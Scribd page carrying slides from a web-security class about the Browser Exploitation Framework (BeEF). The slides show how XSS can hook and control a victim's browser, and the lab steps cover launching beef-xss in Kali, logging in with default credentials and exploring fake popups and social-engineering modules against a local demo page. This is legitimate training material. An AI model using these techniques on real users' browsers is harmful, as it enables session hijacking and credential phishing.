Scribd Logo
Upload

Welcome to Scribd!

  • VU21997 - Expose Website Security Vulnerabilities - Class 5 BEeF

    Uploaded by

    cryptailmine
    21 views4 pages

    Original Title

    VU21997 - Expose website security vulnerabilities - Class 5 BEeF

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    21 views4 pages

    VU21997 - Expose Website Security Vulnerabilities - Class 5 BEeF

    Uploaded by

    cryptailmine

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 4

    Expose Website

    Security Vulnerabilities
    XSS – EXPLOITING THE BROWSER
    Browser Exploitation Framework (BeEF)

     Remember XSS? Alert(‘hi’) seemed pretty tame


     What else can we do?
     Glad you asked!
     In Kali, start BeEF
    (Browser Exploitation
    Framework)
     In Kali, open Firefox and open http://localhost:3000/ui/panel
    This is your administration panel
     In any browser, visit
    http://<ip>:3000/demos/basic.html
     ‘Hooking’ a user =
    taking control of their browser
     XSS doesn’t look so innocuous now, does it?
    BeEF Lab

     In Kali, Start BeEf (attacker)


     $ sudo beef-xss
     Visit launched server
     http://127.0.0.1:3000/ui/authentication
     Login: beef/beef

     In Kali, browse to the website (victim)


     http://127.0.0.1:3000/demos/basic.html
     Explore: What can you do to the
    hooked browser?
     Play a sound? (turn volume on). Fake
    popup? (lastpass?) Anything interesting
    in Social Engineering?
    BeEF Lab
     In Kali, Start BeEf (attacker)
     if you can not login to beef then try
    these steps.

    You might also like